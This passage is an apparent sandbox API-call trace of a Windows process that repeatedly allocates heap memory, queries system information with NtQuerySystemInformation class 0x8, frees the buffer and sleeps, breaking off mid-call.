[0236.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.048] Sleep (dwMilliseconds=0x110) [0236.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.088] Sleep (dwMilliseconds=0x110) [0236.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.098] Sleep (dwMilliseconds=0x110) [0236.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.117] Sleep (dwMilliseconds=0x110) [0236.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.126] Sleep (dwMilliseconds=0x110) [0236.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.144] Sleep (dwMilliseconds=0x110) [0236.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.158] Sleep (dwMilliseconds=0x110) [0236.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.178] Sleep (dwMilliseconds=0x110) [0236.184] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.184] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.190] Sleep (dwMilliseconds=0x110) [0236.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.207] Sleep (dwMilliseconds=0x110) [0236.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.223] Sleep (dwMilliseconds=0x110) [0236.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.237] Sleep (dwMilliseconds=0x110) [0236.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.255] Sleep (dwMilliseconds=0x110) [0236.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.270] Sleep (dwMilliseconds=0x110) [0236.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, 